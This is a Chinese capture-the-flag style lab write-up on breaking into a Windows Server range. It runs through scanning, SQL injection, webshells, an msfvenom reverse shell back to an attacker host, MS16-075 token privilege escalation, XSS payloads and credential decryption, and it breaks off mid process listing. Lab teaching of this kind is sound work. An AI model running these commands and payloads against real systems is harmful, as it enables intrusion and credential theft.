基于windows server的简单内网渗透
-
- 一.内网发现
-
-
- 1) 探测存活IP
- 2) 扫端口
- 3) 探测端口信息
- 4) 设置DNS,绑定网关
- 5) 挖掘子域名
- 6) 寻找并利用网站漏洞,进入网站后台
- 6.1.0) 网站一 new.cc123.com
- 6.1.1) 利用版本信息
- 6.1.2) `GetShell`
- 6.1.3) 提权
- 6.2.0) 网站二 ww2.cc123.com
- 6.2.1) 扫描网站目录
- 6.2.2) 验证码重复利用
- 6.2.3) 是否存在注入漏洞
- 6.2.4) 验证xss漏洞
- 6.2.5) 验证是否存在文件上传
- 6.2.6) 验证新闻模块是否存在SQL注入
- 6.3) 代码审计
- 6.3.1) 后台登陆模块
- 6.3.2) 新闻模块
- 6.3.3) 编辑器
- 6.3.4) 文件上传
- 6.3.5) xss 漏洞(前台)
- 6.4.0) 利用大马连接数据库
- 6.4.1) 审计加密方法
- 6.4.0) mimikatz 破解哈希
-
- 二.内网渗透
-
- 1. 数据库服务器
-
- 1)添加路由及代理
- 2) 正向连接进入10.10.10.0/24网段
- 3) 破解哈希
- 2.目标主机
-
- 1) 建立路由,内网穿刺
- 2) 利用proxychains 扫描内网
- 3) 利用相关漏洞
- 3.1) 编写漏洞利用工具
- 3.2) 使用该工具写马
- 3.3) 建立代理,使用菜刀连接webs hell
- 4) 在msf上建立会话
- 5) 破解哈希
- 三. 四个flag
-
- 1.第一个
- 2.第二个
- 3.第三个
- 4.第四个
0.靶场环境搭建
域名IP绑定(设置DNS服务器)
一.内网发现
1) 探测存活IP
netdiscover 内网发现
netdiscover -i eth0 -r 192.168.0.0/24
//netdiscover -i 网卡 -r 目标网段
或
nmap -sn 192.168.0.0/24
//nmap -sn 网段
2) 扫端口
masscan 快速扫描端口工具
masscan -p 1-65535 192.168.0.134 --rate==1000
masscan -p 1-65535 192.168.0.134 --rate=1000 --interface=eth0
//masscan -p 端口号 目标IP --rate==发包率 --interface=指定网卡
//指定网卡也可以解决找不到默认网卡的问题
或还是用nmap(除了有些慢,还是很香的)
nmap 192.168.0.134 -sT -sV -p 1-65535
//nmap IP 扫描模式 -p 端口
扫描结果(nmap有结果,masscan找不到默认网关,设置默认网关即可)
53 可能配有dns服务器
999 phpMyAdmin
坑一:masscan找不到默认网卡
查看网卡
arp添加默认网卡路由信息
route add default gw 192.168.0.1 eth0 route add default gw 网关ip 网卡填坑完成:
3) 探测端口信息
nmap 扫描端口信息
nmap 192.168.0.134 -sC -A -p 21,53,80,135,999,3389,6588,49154,49155 -oA cc123-port
//nmap IP -sC(模式) -A(全部) -p 端口 -oA 导出文件名
扫描结果
网页访问端口获取信息
80
999
6588
4) 设置DNS,绑定网关
坑二: 设置失败(此时设置的是日常上网的网卡),继续使用绑定hosts文件
解决方法(正确设置DNS):
设置相应网段网卡(192.138.0.0段的网卡)
kali 绑定的那个网关
vi /etc/resolv.conf
更改网关为dns服务器IP
5) 挖掘子域名
使用wfuzz
wfuzz -w /usr/share/amass/wordlists/subdomains-top1mil-110000.txt -u cc123.com -H "Host:FUZZ.cc123.com" --hw 53
//wfuzz -w 字典路径 -u 域名 -H "Host:FUZZ(占位符).cc123.com"(类似与规定遍历格式) --hw 过滤端口
也可使用小一些的字典
# wfuzz -w /usr/share/amass/wordlists/subdomains-top1mil-5000.txt -u cc123.com -H "Host:FUZZ.cc123.com" --hw 53/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************Target: http://cc123.com/
Total requests: 5000=====================================================================
ID Response Lines Word Chars Payload
=====================================================================000000001: 200 969 L 2160 W 43741 Ch "www"
000000030: 200 461 L 1270 W 22594 Ch "new"
000001176: 200 969 L 2160 W 43741 Ch "WWW"
000002700: 400 6 L 26 W 334 Ch "m."
000002795: 400 6 L 26 W 334 Ch "ns2.cl.bellsouth.net."
000002885: 400 6 L 26 W 334 Ch "ns2.viviotech.net."
000002883: 400 6 L 26 W 334 Ch "ns1.viviotech.net."
000003050: 400 6 L 26 W 334 Ch "ns3.cl.bellsouth.net."
000004081: 400 6 L 26 W 334 Ch "ferrari.fortwayne.com."
000004083: 400 6 L 26 W 334 Ch "quatro.oweb.com."
000004082: 400 6 L 26 W 334 Ch "jordan.fortwayne.com."
000000267: 200 931 L 1878 W 30822 Ch "ww2" Total time: 19.28832
Processed Requests: 5000
Filtered Requests: 4988
Requests/sec.: 259.2241分别访问(需要提前绑定DNS服务器)
www.cc123.com
new.cc123.com
ww2.cc123.com
子域名:
www.cc123.com
ww2.cc123.com
new.cc123.com
6) 寻找并利用网站漏洞,进入网站后台
6.1.0) 网站一 new.cc123.com
6.1.1) 利用版本信息
检查版本号
/data/admin/ver.txt
20150618
dede/login.php
//默认后台登录页面(实战中可能多套一层路径等)
可尝试默认密码登录
尝试member是否开启
/member/
进行注册
网络搜索该版本漏洞,使用相应exp
该exp需要cookie,以及python2主机环境运行
需要添加分类,漏洞在分类功能,需要分类id等数据来进行注入
python2 Dedecms_20150618_member_sqli.py http://new.cc123.com
exp结果
MD5解密
获取密码成功登录后台
6.1.2) GetShell
上传一句话木马
蚁剑连接,getshell
6.1.3) 提权
上传aspx脚本文件
访问并登录
能执行cmd命令
联合metasploit进行下一步操作
生成shell
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.128 lport=8888 -f exe > /root/shell.exe
上传wt.asp(检查网站目录权限)并访问
在c:\windows\debug\WIA\目录中上传shell.exe,利用脚本执行,与msf建立会话
查看IP 以及权限等基础信息
使用msf提权模块(kali2021 msf6使用POST报错,更换kali2020 msf5)
msf6 exploit(multi/handler) > use post/multi/recon/local_exploit_suggester
msf6 post(multi/recon/local_exploit_suggester) > optionsModule options (post/multi/recon/local_exploit_suggester):Name Current Setting Required Description---- --------------- -------- -----------SESSION yes The session to run this module onSHOWDESCRIPTION false yes Displays a detailed description for the available exploits
msf6 post(multi/recon/local_exploit_suggester) > set session 1
session => 1
msf6 post(multi/recon/local_exploit_suggester) > run
[*] 192.168.0.134 - Collecting local exploits for x86/windows...[*] 192.168.0.134 - 30 exploit checks are being tried...
[+] 192.168.0.134 - exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable.
[+] 192.168.0.134 - exploit/windows/local/ikeext_service: The target appears to be vulnerable.
[+] 192.168.0.134 - exploit/windows/local/ms10_092_schelevator: The target appears to be vulnerable.
[+] 192.168.0.134 - exploit/windows/local/ms13_053_schlamperei: The target appears to be vulnerable.
[+] 192.168.0.134 - exploit/windows/local/ms13_081_track_popup_menu: The target appears to be vulnerable.
[+] 192.168.0.134 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 192.168.0.134 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 192.168.0.134 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The service is running, but could not be validated.
[+] 192.168.0.134 - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable.
[+] 192.168.0.134 - exploit/windows/local/ms16_075_reflection_juicy: The target appears to be vulnerable.
[+] 192.168.0.134 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.
[*] Post module execution completed返回结果
使用提权模块 ms16_075_reflection_juicy(常用)
msf5 post(multi/recon/local_exploit_suggester) > use exploit/windows/local/ms16_075_reflection_juicy
msf5 exploit(windows/local/ms16_075_reflection_juicy) > optionsModule options (exploit/windows/local/ms16_075_reflection_juicy):Name Current Setting Required Description---- --------------- -------- -----------CLSID {4991d34b-80a1-4291-83b6-3328366b9097} yes Set CLSID value of the DCOM to triggerSESSION yes The session to run this module on.Exploit target:Id Name-- ----0 Automaticmsf5 exploit(windows/local/ms16_075_reflection_juicy) > set session 1
session => 1
msf5 exploit(windows/local/ms16_075_reflection_juicy) > run
失败
坑三:提权端口设置
在ms16-075 提权
监听主机非127.0.0.1
权限需要从网站权限开始提升
没有
lportlport参数,但仍然可以设置
use exploit/windows/local/ms16_075_reflection_juicy set lhost 192.168.0.129 //不能用127.0.0.1 set lport 4444 set session 1 exploit
使用MS16-075 提权【令牌窃取】
上传exp
c:\windows\debug\WIA\potato.exe
在session中
use incognito
list_tokens -u //列出tokens
执行exp
execute -cH -f c:/windows/debug/WIA/potato.exe
再次查看list_tokens -u
impersonate_token “NT AUTHORITY\SYSTEM” //进行提权
只运行一次exp结果失败,可尝试多运行几次
获取system权限
6.2.0) 网站二 ww2.cc123.com
6.2.1) 扫描网站目录
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Encoding: gzip
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Fri, 16 Jul 2021 15:49:37 GMT
Content-Length: 11541从返回头可以判断 该网站是 ASP4.0 网站
从URL判断全局伪静态
使用gobuster (非kali自带)扫描网站目录(速度快)
gobuster dir -u http://ww2.cc123.com -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x 'aspx,html,zip' --timeout 20000ms -o /home/kali/Desktop/cc123/ww2_cc123.com.txt
//gobuster dir -u 网站(带http) -w 字典 -x '后缀名' --timeout 时间ms [默认10s] -o 保存路径
可以适当利用命令过滤(不过分析时没有特殊要求,还是直接用带所有状态码的文件比较好,不容易错过admin重定向的结果)
cat /home/kali/Desktop/cc123/ww2_cc123.com.txt|grep 200 > /home/kali/Desktop/cc123/ww2.com.txt
//过滤 200 或 301(重定向) 的结果方便分析
发现admin
6.2.2) 验证码重复利用
可先使用默认密码【一般木大】
使用burpsuite抓包,尝试是否存在验证码可重复利用漏洞
2,3提交均为姓名与密码输入错误,由此判断,存在验证码可重复利用
可以进行密码爆破
6.2.3) 是否存在注入漏洞
在参数里尝试注入,查看是否报错(可以用浏览器查看,有些中文在BP呈现乱码)
发现重定向,和跳转路径
进入跳转路径,成功进入网站后台
6.2.4) 验证xss漏洞
结合后台目录,进入 /message.aspx 留言板模块
验证是否过滤 html标签
提交后进入后台查看
有标签效果,存在xss(存储型)
尝试alert
可执行js代码
可以 xss 注入盗取cookie的js代码,当管理员访问该页面时,会执行js代码,获得管理员cookie,进入后台
6.2.5) 验证是否存在文件上传
发现文件上传点
BP抓包
采用 白名单
技术不够验证失败
6.2.6) 验证新闻模块是否存在SQL注入
新闻模块存在id等参数传递,
BP抓包
利用 sqlmap 尝试 注入
sqlmap -r cc123.txt --dbms mssql -v 1 --batch
//sqlmap -r 指定文件 --dbms 数据库类型 -v 显示详细信息 --batch 选择默认
存在 sql注入
查看数据库
sqlmap数据获取存在问题
查看当前数据库以及当前用户
sqlmap -r cc123.txt --dbms mssql -v 1 --batch --current-db --current-user
当前用户为 sa 权限较大可以尝试 执行 shell
sqlmap -r cc123.txt --dbms mssql -v 1 --os-shell
//返回shell
成功
可执行命令
数据库服务器的IP:
Windows IP 配置
以太网适配器 本地连接 2:
连接特定的 DNS 后缀 . . . . . . . :
本地链接 IPv6 地址. . . . . . . . : fe80::70bc:cf3:8c1c:737e▒
IPv4 地址 . . . . . . . . . . . . : 10.10.1.128
子网掩码 . . . . . . . . . . . . : 255.255.255.0
默认网关. . . . . . . . . . . . . :以太网适配器 本地连接:
连接特定的 DNS 后缀 . . . . . . . :
本地链接 IPv6 地址. . . . . . . . : fe80::ec7d:88c4:723a:e954
IPv4 地址 . . . . . . . . . . . . : 10.10.10.136
子网掩码 . . . . . . . . . . . . : 255.255.255.0
默认网关. . . . . . . . . . . . . :
此处为站库分离
查看当前权限
已经为system权限
查看端口开放
活动连接
协议 本地地址 外部地址 状态 PID
TCP 0.0.0.0:80 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING 692
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:1433 0.0.0.0:0 LISTENING 1152
TCP 0.0.0.0:2383 0.0.0.0:0 LISTENING 1180
TCP 0.0.0.0:47001 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:49152 0.0.0.0:0 LISTENING 368
TCP 0.0.0.0:49153 0.0.0.0:0 LISTENING 740
TCP 0.0.0.0:49154 0.0.0.0:0 LISTENING 836
TCP 0.0.0.0:49155 0.0.0.0:0 LISTENING 484
TCP 0.0.0.0:49160 0.0.0.0:0 LISTENING 476
TCP 0.0.0.0:49161 0.0.0.0:0 LISTENING 1928
TCP 10.10.1.128:139 0.0.0.0:0 LISTENING 4
TCP 10.10.10.136:139 0.0.0.0:0 LISTENING 4
TCP 10.10.10.136:1433 10.10.10.135:49561 ESTABLISHED 1152
TCP 127.0.0.1:1434 0.0.0.0:0 LISTENING 1152
TCP [::]:80 [::]:0 LISTENING 4
TCP [::]:135 [::]:0 LISTENING 692
TCP [::]:445 [::]:0 LISTENING 4
TCP [::]:1433 [::]:0 LISTENING 1152
TCP [::]:2383 [::]:0 LISTENING 1180
TCP [::]:47001 [::]:0 LISTENING 4
TCP [::]:49152 [::]:0 LISTENING 368
TCP [::]:49153 [::]:0 LISTENING 740
TCP [::]:49154 [::]:0 LISTENING 836
TCP [::]:49155 [::]:0 LISTENING 484
TCP [::]:49160 [::]:0 LISTENING 476
TCP [::]:49161 [::]:0 LISTENING 1928
TCP [::1]:1434 [::]:0 LISTENING 1152
UDP 0.0.0.0:123 : 920
UDP 0.0.0.0:500 : 836
UDP 0.0.0.0:4500 : 836
UDP 0.0.0.0:5355 : 1004
UDP 10.10.1.128:137 : 4
UDP 10.10.1.128:138 : 4
UDP 10.10.10.136:137 : 4
UDP 10.10.10.136:138 : 4
UDP 127.0.0.1:64117 : 2904
UDP [::]:123 : 920
UDP [::]:500 : 836
伪静态的网页,可以在会话中查看cof文件找相应文件的相应参数,在url中访问 (判断是否能够注入)
6.3) 代码审计
利用蚁剑找到网站目录,在kali会话中下载网站源码
C:/HwsHostMaster/wwwroot/ww2cc123_55m39g/web
download bin
mv bin cc123s
//移动文件夹到 cc123
6.3.1) 后台登陆模块
审计admin/login.aspx
代码在ccwl_admin_login,App_Web_login.aspx.fdf7a39c中
此处为验证登录
protected void ImageButton1_Click(object sender, ImageClickEventArgs e){if (!(base.Request.Cookies["CheckCode"].Value == this.safecode.Text.Trim().ToUpper()))//从cookie中取验证码值,与正确验证码(收益为去空格转大写)比较,不等进入{base.Response.Write("<script>alert('验证码输入错误!');javascript:history.back(-1);</script>");//错误时没有注销验证码,存在可重复利用漏洞return;}string sql = string.Concat(new string[]{//此处使用concat将SQL语句连接"select*from admin where username='",this.username.Text.Trim(), //没有进行参数过滤,存在SQL注入"' and password='",StringClass.Encrypt(this.password.Text.Trim(), "yx139222"),//Encrypt为自定义加密函数,后面参数为密钥"'"});DataSet tableData = DBClass.GetTableData(sql, "admin");//执行sql语句并获取数据if (tableData != null && tableData.Tables["admin"].Rows.Count > 0){this.Session["users"] = this.username.Text.Trim();base.Response.Redirect("index.aspx");return;}base.Response.Write("<script>alert('姓名或密码输入错误!');javascript:history.back(-1);</script>");}
6.3.2) 新闻模块
newsadd.aspx
加载页面代码
protected void Page_Load(object sender, EventArgs e){if (base.Request.QueryString["pid"] != null && base.Request.QueryString["pid"].ToString() != "")//字符串不为空进入{this.pid = Convert.ToInt32(base.Request.QueryString["pid"].ToString());//字符串pid转为整型32,不存在注入}AdminCs.CheckLoginState();//验证登陆状态(通过判断user的值,若为登录重定向到登陆页面)if (!base.IsPostBack)//是否有post提交{this.p.type(this.DropDownList1, this.pid.ToString());if (base.Request.QueryString["id"] != null)//QueryString获取字符串{this.Button1.Visible = false;this.Button2.Visible = true;string sql = "select*from news where id=" + base.Request.QueryString["id"].ToString();//直接获取id字符串无过滤,存在注入DataSet tableData = DBClass.GetTableData(sql, "sql");//执行语句if (tableData.Tables["sql"].Rows.Count > 0){this.DropDownList1.SelectedValue = tableData.Tables["sql"].Rows[0]["type"].ToString();this.Textbox1.Text = tableData.Tables["sql"].Rows[0]["title"].ToString();this.txtProImg.Text = tableData.Tables["sql"].Rows[0]["images"].ToString();this.content1.InnerHtml = tableData.Tables["sql"].Rows[0]["content"].ToString();}}}}
6.3.3) 编辑器
查看编辑器为 KindEditor
漏洞存在于kindeditor编辑器里,你能上传.txt和.html文件,且漏洞存在于小于等于kindeditor4.1.5编辑器中
在上传图片处上传 恶意html文件并使用BP抓包
2.html内容为盗取cookie
修改包内信息绕过验证上传
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-XVoe9D02-1654765417587)(.\ff.assets\image-20210718141841365.png)]
上传成功
{"error":0,"url":"/editor/asp.net/../attached/file/20210718/20210718142058_2606.html"}
验证成功
6.3.4) 文件上传
上传点抓包,定位文件,利用关键参数寻找相应处理代码
关键参数
处理代码
protected void UpImg_Click(object sender, EventArgs e){if (base.Request.Url.ToString().IndexOf("grcms.cn") > 0)//IndexOf函数返回字串中"grcms.cn"首次出现的位置,以此判断是否改变此值{base.Response.Write("<script>alert('网站样例,不可以修改数据。');location.href='" + base.Request.Url.ToString() + "';</script>");return;}if (this.FileUpload1.PostedFile.ContentLength >= 500000)//判断大小{base.Response.Write("<script language='javascript'>alert('你的图片已经超过500K的大小!');</script>");return;}string fileName = this.FileUpload1.FileName;string text = DateTime.Now.ToString("yyyyMMddhhmmss");//用时间命名文件名fileName.Substring(fileName.LastIndexOf("\\") + 1);string text2 = fileName.Substring(fileName.LastIndexOf(".") + 1);//获取后缀名if (text2 == "bmp" || text2 == "jpg" || text2 == "gif" || text2 == "JPG" || text2 == "BMP" || text2 == "GIF" || text2 == "png") //白名单{this.FileUpload1.SaveAs(string.Concat(new string[]{base.Server.MapPath("\\UpImg"),"\\",text,".",text2}));"UpImg/" + text + "." + text2;this.txtProImg.Text = "UpImg/" + text + "." + text2;//用文件名和用于判断的后缀名组合成新的文件保存,不存在注入(使用1.php;.png保存后也变为time.png)return;}base.Response.Write("<script language='javascript'>alert('支持格式:|jpg|gif|bmp|png|');</script>");}
审计可发现此处不存在上传漏洞
6.3.5) xss 漏洞(前台)
mystat.aspx
代码:
<%@ page language="c#" runat="server" %>
<script language="c#" runat="server">
public string strStyle;
public string strtheurl;
public void Page_Load(Object src,EventArgs e)
{NameValueCollection ServerVariables = Request.ServerVariables;strStyle=Request.QueryString["style"];//获取style值strtheurl=ServerVariables["URL"].ToString();//获取urlstrtheurl=strtheurl.Substring(0,strtheurl.IndexOf("mystat.aspx",0,strtheurl.Length));strtheurl="http://"+ServerVariables["HTTP_HOST"].ToString()+strtheurl;}
</script> //此处js代码用于输出,且前面的style未过滤,存在xss
document.write("<script>var style='<%=strStyle%>';var url='<%=strtheurl%>';</script>")
_dwrite("<script language=javascript src="+url+"stat.aspx?style="+style+"&referer="+escape(document.referrer)+"&screenwidth="+(screen.width)+"></script>");
function _dwrite(string) {document.write(string);}
验证成功
带入参数后的源代码
闭合的url:
ww2.cc123.com/mystat.aspx?style=1'</script>""<script>alert(/xss/);'
ww2.cc123.com/mystat.aspx?style=</script><script>alert(/xss/);</script><script>
6.4.0) 利用大马连接数据库
利用之前的sys权限会话查看数据库配置
<add key="ConnectionString" value="server=WIN-JJU7KU45PN7;database=grcms_data;uid=sa;pwd=!@#a123.." />
连接成功
查询管理员密码
select * from admin
id username password
28 admin AE5F6187F32825CA
30 cc123 B97C57DB005F954242450A255217DA9F
//尝试MD5失败,代码分析加密方法
6.4.1) 审计加密方法
在管理员登录模块,寻找加密函数
加密解密模块
DESC加密源代码:
// StringClass
public static string Encrypt(string pToEncrypt, string sKey)
{DESCryptoServiceProvider dESCryptoServiceProvider = new DESCryptoServiceProvider();byte[] bytes = Encoding.Default.GetBytes(pToEncrypt);dESCryptoServiceProvider.Key = Encoding.ASCII.GetBytes(sKey);dESCryptoServiceProvider.IV = Encoding.ASCII.GetBytes(sKey);MemoryStream memoryStream = new MemoryStream();CryptoStream cryptoStream = new CryptoStream(memoryStream, dESCryptoServiceProvider.CreateEncryptor(), CryptoStreamMode.Write);cryptoStream.Write(bytes, 0, bytes.Length);cryptoStream.FlushFinalBlock();StringBuilder stringBuilder = new StringBuilder();byte[] array = memoryStream.ToArray();for (int i = 0; i < array.Length; i++){byte b = array[i];stringBuilder.AppendFormat("{0:X2}", b);}stringBuilder.ToString();return stringBuilder.ToString();
}
DESC解密源代码:
// StringClass
public static string Decrypt(string pToDecrypt, string sKey)
{DESCryptoServiceProvider dESCryptoServiceProvider = new DESCryptoServiceProvider();byte[] array = new byte[pToDecrypt.Length / 2];for (int i = 0; i < pToDecrypt.Length / 2; i++){int num = Convert.ToInt32(pToDecrypt.Substring(i * 2, 2), 16);array[i] = (byte)num;}dESCryptoServiceProvider.Key = Encoding.ASCII.GetBytes(sKey);dESCryptoServiceProvider.IV = Encoding.ASCII.GetBytes(sKey);MemoryStream memoryStream = new MemoryStream();CryptoStream cryptoStream = new CryptoStream(memoryStream, dESCryptoServiceProvider.CreateDecryptor(), CryptoStreamMode.Write);cryptoStream.Write(array, 0, array.Length);cryptoStream.FlushFinalBlock();new StringBuilder();return Encoding.Default.GetString(memoryStream.ToArray());
}
有解密函数和key后,可以编写解密工具
此处使用VS2012 C# NET4.5 窗体应用程序
工具代码:
using System;
using System.Collections.Generic;
using System.ComponentModel;
using System.Data;
using System.Drawing;
using System.IO;
using System.Linq;
using System.Security.Cryptography;
using System.Text;
using System.Threading.Tasks;
using System.Windows.Forms;namespace WindowsFormsApplication1
{public partial class Form1 : Form{public Form1(){InitializeComponent();}public static string Decrypt(string pToDecrypt, string sKey){DESCryptoServiceProvider dESCryptoServiceProvider = new DESCryptoServiceProvider();byte[] array = new byte[pToDecrypt.Length / 2];for (int i = 0; i < pToDecrypt.Length / 2; i++){int num = Convert.ToInt32(pToDecrypt.Substring(i * 2, 2), 16);array[i] = (byte)num;}dESCryptoServiceProvider.Key = Encoding.ASCII.GetBytes(sKey);dESCryptoServiceProvider.IV = Encoding.ASCII.GetBytes(sKey);MemoryStream memoryStream = new MemoryStream();CryptoStream cryptoStream = new CryptoStream(memoryStream, dESCryptoServiceProvider.CreateDecryptor(), CryptoStreamMode.Write);cryptoStream.Write(array, 0, array.Length);cryptoStream.FlushFinalBlock();new StringBuilder();return Encoding.Default.GetString(memoryStream.ToArray());}private void button1_Click(object sender, EventArgs e){string text1 = textBox1.Text.Trim();string key = textBox2.Text.Trim();textBox3.Text = Decrypt(text1, key);}}
}
解码(密钥:yx139222)后:
username password 明文admin AE5F6187F32825CA cc123cc123 B97C57DB005F954242450A255217DA9F qweasd123
6.4.0) mimikatz 破解哈希
查看网卡
meterpreter > ifconfigInterface 1
============
Name : Software Loopback Interface 1
Hardware MAC : 00:00:00:00:00:00
MTU : 4294967295
IPv4 Address : 127.0.0.1
IPv4 Netmask : 255.0.0.0
IPv6 Address : ::1
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffffInterface 11
============
Name : Intel(R) PRO/1000 MT Network Connection
Hardware MAC : 00:0c:29:b3:2c:c4
MTU : 1500
IPv4 Address : 192.168.0.134
IPv4 Netmask : 255.255.255.0
IPv6 Address : fe80::29a6:8c8a:11:efec
IPv6 Netmask : ffff:ffff:ffff:ffff::Interface 12
============
Name : Microsoft ISATAP Adapter
Hardware MAC : 00:00:00:00:00:00
MTU : 1280
IPv6 Address : fe80::5efe:a0a:a87
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffffInterface 13
============
Name : Intel(R) PRO/1000 MT Network Connection #2
Hardware MAC : 00:0c:29:b3:2c:ce
MTU : 1500
IPv4 Address : 10.10.10.135
IPv4 Netmask : 255.255.255.0
IPv6 Address : fe80::a8c0:fbd9:becb:548f
IPv6 Netmask : ffff:ffff:ffff:ffff::Interface 14
============
Name : Microsoft ISATAP Adapter #2
Hardware MAC : 00:00:00:00:00:00
MTU : 1280
IPv6 Address : fe80::5efe:c0a8:86
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffffweb服务器
192.168.0.134
10.10.10.135
使用 run get_local_subnets 命令查看路由
meterpreter > run get_local_subnets
[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
Local subnet: 10.10.10.0/255.255.255.0
Local subnet: 192.168.0.0/255.255.255.0
在使用mimikatz等破解哈希的工具时必须转移进程否则会出错
使用 ps 查看项目进程
meterpreter > psProcess List
============PID PPID Name Arch Session User Path--- ---- ---- ---- ------- ---- ----0 0 [System Process] 4 0 System x64 0 232 4 smss.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\smss.exe300 1584 w3wp.exe x86 0 IIS APPPOOL\newcc123 C:\Windows\SysWOW64\inetsrv\w3wp.exe328 308 csrss.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\csrss.exe400 308 wininit.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\wininit.exe408 508 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe416 408 csrss.exe x64 1 NT AUTHORITY\SYSTEM C:\Windows\System32\csrss.exe464 408 winlogon.exe x64 1 NT AUTHORITY\SYSTEM C:\Windows\System32\winlogon.exe508 400 services.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\services.exe520 400 lsass.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\lsass.exe528 400 lsm.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\lsm.exe624 508 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe684 508 vmacthlp.exe x64 0 NT AUTHORITY\SYSTEM C:\Program Files\VMware\VMware Tools\vmacthlp.exe728 508 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\svchost.exe804 508 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe840 508 dns.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\dns.exe856 508 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe904 508 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe956 508 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe1004 508 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\svchost.exe1048 508 spoolsv.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\spoolsv.exe1084 508 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe1104 508 dllhost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\dllhost.exe1156 508 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe1168 508 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe1180 508 HwsHostSvc.exe x86 0 NT AUTHORITY\SYSTEM C:\HwsHostMaster\HwsHostSvc.exe1320 508 inetinfo.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\inetsrv\inetinfo.exe1332 624 slui.exe x64 1 WIN-KALKEMT3JMA\Administrator C:\Windows\System32\slui.exe1408 508 msdtc.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\msdtc.exe1412 508 mysqld.exe x86 0 WIN-KALKEMT3JMA\MySQL_HWS C:\HwsHostMaster\phpweb\mysql\bin\mysqld.exe1476 508 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe1516 508 VGAuthService.exe x64 0 NT AUTHORITY\SYSTEM C:\Program Files\VMware\VMware Tools\VMware VGAuth\VGAuthService.exe1560 508 vmtoolsd.exe x64 0 NT AUTHORITY\SYSTEM C:\Program Files\VMware\VMware Tools\vmtoolsd.exe1584 508 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe1820 508 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\svchost.exe1852 508 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\svchost.exe2144 1584 w3wp.exe x64 0 IIS APPPOOL\cc123 C:\Windows\System32\inetsrv\w3wp.exe2220 624 WmiPrvSE.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\wbem\WmiPrvSE.exe2296 508 TrustedInstaller.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\servicing\TrustedInstaller.exe2372 328 conhost.exe x64 0 IIS APPPOOL\newcc123 C:\Windows\System32\conhost.exe2472 508 taskhost.exe x64 1 WIN-KALKEMT3JMA\Administrator C:\Windows\System32\taskhost.exe2552 2780 mmc.exe x64 1 WIN-KALKEMT3JMA\Administrator C:\Windows\System32\mmc.exe2576 508 sppsvc.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\sppsvc.exe2596 300 cmd.exe x86 0 IIS APPPOOL\newcc123 c:\windows\SysWOW64\cmd.exe2680 2780 AspNet.exe x86 1 WIN-KALKEMT3JMA\Administrator C:\Users\Administrator\Desktop\pageadmin_school_3.0.170214\AspNet.exe2756 956 dwm.exe x64 1 WIN-KALKEMT3JMA\Administrator C:\Windows\System32\dwm.exe2780 2748 explorer.exe x64 1 WIN-KALKEMT3JMA\Administrator C:\Windows\explorer.exe2804 856 taskeng.exe x64 1 WIN-KALKEMT3JMA\Administrator C:\Windows\System32\taskeng.exe2864 2780 vmtoolsd.exe x64 1 WIN-KALKEMT3JMA\Administrator C:\Program Files\VMware\VMware Tools\vmtoolsd.exe2924 2872 HwsHostPanel.exe x86 1 WIN-KALKEMT3JMA\Administrator C:\HwsHostMaster\HwsHostPanel.exe2964 3388 notepad.exe 